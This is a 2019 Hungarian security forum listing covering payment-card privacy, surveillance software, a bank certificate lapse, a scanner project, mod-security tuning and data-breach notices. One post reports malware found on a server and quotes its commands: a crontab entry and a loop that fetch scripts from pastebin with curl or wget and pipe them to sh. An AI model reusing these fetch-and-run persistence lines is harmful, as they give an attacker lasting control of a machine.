Security-all

Weben bankkártya fizetés, CVC kód láthatósága

( KGer | 2019. 05. 14., k – 10:50 )
Security-all

Több helyen belefutottam abba, hogy weben jegyet akarok venni egy rendezvényre (mondjuk legyen rendezveny123.hu) és azt látom hogy

Név
Bankkártya száma
Lejárati dátum
CVC kód

egy az egybe megy HTTP POST adatként a rendezveny123.hu site-ra, ahol az ottani rendszergazda vagy fejlesztő ha akarja ki tudja olvasni magának és akár egy adatbázist építhet belőle.

Én tartok attól hogy egyszer csak kapok egy sms-t hogy 20.000 Ft-ot leemeltek vmelyik országból és azt se tudom majd hol szivárgott ki.

Mindig új bankkártyát igényelni meg idő és macera.
Külön webkártyát használok limittel, de annak a hozzáférési adatait se szívesen adom meg minden site-nak/bárkinek/senkinek.

Régen ezt úgy oldották meg hogy pl az OTP oldala felugrott egy új tab-ban vagy frame-ben és azon keresztül tudtam fizetni, szóval a rendezveny123.hu semmit se látott a bankkártyás adataimból, ami sztem rendben van.

Írtam erről a problémáról az egyik rendezveny123.hu-nak, olyan csarnok ahova naponta több ezren/tízezren mennek, azt a sablon választ kaptam hogy sok évtizede működik és teljesen biztonságos és még sohase volt semmi gond.

Én gondolom rosszul ezt a biztonsági dolgot, vagy ez most tényleg így működik?

A gondom az hogy nagyon sok más helyen is így megy a webes fizetés.

Biztonsági kamera kezelése Linux serveren

( kalmarr | 2019. 04. 17., sze – 20:00 )
Security-all

Sziasztok,

szeretném a segítségeteket kérni abban, hogy milyen alternatívái vannak a biztonsági kamera szoftvereknek Linux rendszeren.
A nagy kérdésem, hogy pl: Synlogic minőségű rendszer - https://www.synology.com/hu-hu/surveillance - elérhetőe-e Linuxon, azaz ha készítek egy NAS szerver-t, akkor pl: ilyen szoftvert tudok-e valahol találni rá? Ami hasonló módon és képeségekkel megbírkozik a feladattal, vagy inkább válasszak inkább egy "kész" NAS szervert, mert nem lesz ilyen jellegű megoldás sehol...

Köszönöm előre is!

Kalmi

Pastebin, mint rootkit store

( _Franko_ | 2019. 04. 13., szo – 15:18 )
Security-all

Egyik szerveremen találtam.

Beleírja magát a cron-ba: 

echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh" | crontab -

Majd ezt futtatva lehozza magát újra és újra: 

(curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh

Letölt ezt-azt, futtat ezt-azt.

OTP

( efel | 2019. 04. 10., sze – 22:12 )
Security-all

https://www.otpbank.hu/portal/hu/JogiEtikaiNyilatkozat

Legalul:

Az OTP Bank Nyrt. által működtetett informatikai rendszer megfelel a 42/2015 (III.12.) Kormányrendeletben meghatározott zárt informatikai rendszer követelményeinek. A tanúsítvány regisztrációs száma: HUNG-T-ZART-389-2018

A Tanúsítvány érvényességének kezdete: 2018. március 31.

A Tanúsítvány érvényességének vége: 2019. március 31. <====

Feedback wanted: CScanner (Cloud Security Scanner)

( janoszen | 2019. 03. 28., cs – 09:07 )
Security-all

Kedves HuP közönség,

Tegnap kicsit fölbosszantottam magam egy security incidensen és azon melegében elkezdtem összerakni egy kis eszközt a probléma orvoslására. Eljutott olyan fázisba (van doksi, stb) hogy elétek bocsájssam visszajelzés céljából.

Forrás kód: https://github.com/janoszen/cscanner
Doksi: https://cscanner.io

Igen, Javaban van írva, a GoLang továbbra sem barátom.

Most a ti véleményetekre vagyok kíváncsi: milyen szabálykészlettel bővítsem még az eszközt?

Köszönöm

János

mod-security fals pozitív?

( Proci85 | 2019. 03. 20., sze – 16:02 )
Security-all

Sziasztok

Cégen belül próbálkozom pár weboldalnál bekapcsolni, mert könnyebb apache szinten megfogni a csúnya postokat, mint php-ból. Utóbbi jobban pörgeti a CPU-t és több hibázási lehetőséget rejt.

A gond viszont az, hogy több false pozitív riasztást ad.
Pl. ha egy fájlt töltenek fel, OK, ha többet már riaszt a 200004 ID-s rule. Ezt a neten többé kevésbé kamunak veszik, kapcsoljam ki..oké.

Aztán ha ckeditorral szerkesztjük az oldalt, akkor még 5 másik rule-t ki kell kapcsolni, mert beleköt a felpostolt tartalom html kódjaiba. Megnéztem egy teszt wordpress ckeditorral, nem feltéten a fejlesztőink a totál bénák. Wordpress szerkesztés is elhasalna alapból.
Jobb híján adott url-eken adott rule-okat kikapcsoltam.
Konkrétan: 


 LocationMatch "/xxxx/edit|add/*"
    SecRuleRemoveById 932100
    SecRuleRemoveById 980130
    SecRuleRemoveById 949110
    SecRuleRemoveById 932115
    SecRuleRemoveById 941100
    SecRuleRemoveById 941160
 /LocationMatch

Lehet ezt szebben csinálni?
Mit kell kérjek a fejlesztőinktől, hogy mod-security comfort legyen a kódjuk?

Armor Games data breach

( _Franko_ | 2019. 03. 13., sze – 09:15 )
Security-all

Dear Armor Games Players,

We respect the privacy of our users which is why as a precautionary measure, we are writing to let you know of a data security incident that may involve your personal information.

What happened? On January 29th, 2019, Tuik Security Group privately contacted us to let us know about a potential breach of our users' data. We immediately began an investigation which included an ongoing audit of our hosting provider, web servers, and database systems. We can now confirm this breach is real and occurred around January 1st, 2019. This appears to be part of a larger breach affecting 16 companies (see this news article for more information). We are one of the smaller companies affected, apparently holding less than 2% of the total accounts affected between the 16 companies. At this time, we have no evidence that any Armor Games’ users’ data was actually misused.

What information was involved? The database affected primarily stores all our website users’ public profiles (information that is already public), login data (usernames, email addresses, IP addresses, and hashed passwords), birthdays of our admin accounts, and information about our password protection processes at the time (including the password salt). We do not have (and thus, this incident does not involve) first or last names, credit card data, addresses, or phone numbers.

Verifications.io leak

( hendrick | 2019. 03. 10., v – 12:12 )
Security-all

In February 2019, the email address validation service verifications.io suffered a data breach. Discovered by Bob Diachenko and Vinny Troia, the breach was due to the data being stored in a MongoDB instance left publicly facing without a password and resulted in 763 million unique email addresses being exposed. Many records within the data also included additional personal attributes such as names, phone numbers, IP addresses, dates of birth and genders. No passwords were included in the data. The Verifications.io website went offline during the disclosure process, although an archived copy remains viewable.

Compromised data: Dates of birth, Email addresses, Employers, Genders, Geographic locations, IP addresses, Job titles, Names, Phone numbers, Physical addresses

Most éjszaka kaptam a leakről emailt a have I been pwned-tól. Elég szép kis adatbáziskapcsolásnak tűnik, részletek azoknak, akik nem kaptak mailt. Az nem igazán derül ki számomra, hogy az email címből hogyan építették tovább a másik adatokat, pedig ez lett volna érdekes, főleg az érdekelt volna, hogy az én emailcímem mellett milyen adatok vannak fent, de ez ebből nem derül már ki.
A cikkekben közöltek alapján mindenkinek volt email címe az adatbázisban, a többi adat pedig már nem minden emailhez volt hozzátársítva, így pwned értesítése tök haszontalannak tűnik jelen esetben, mivel úgy tűnik az érintett adatok köre minden emailcímnél egy egyedi kombináció. Itt az ideje leiratkozni?

Feliratkozás a következőre: Security-all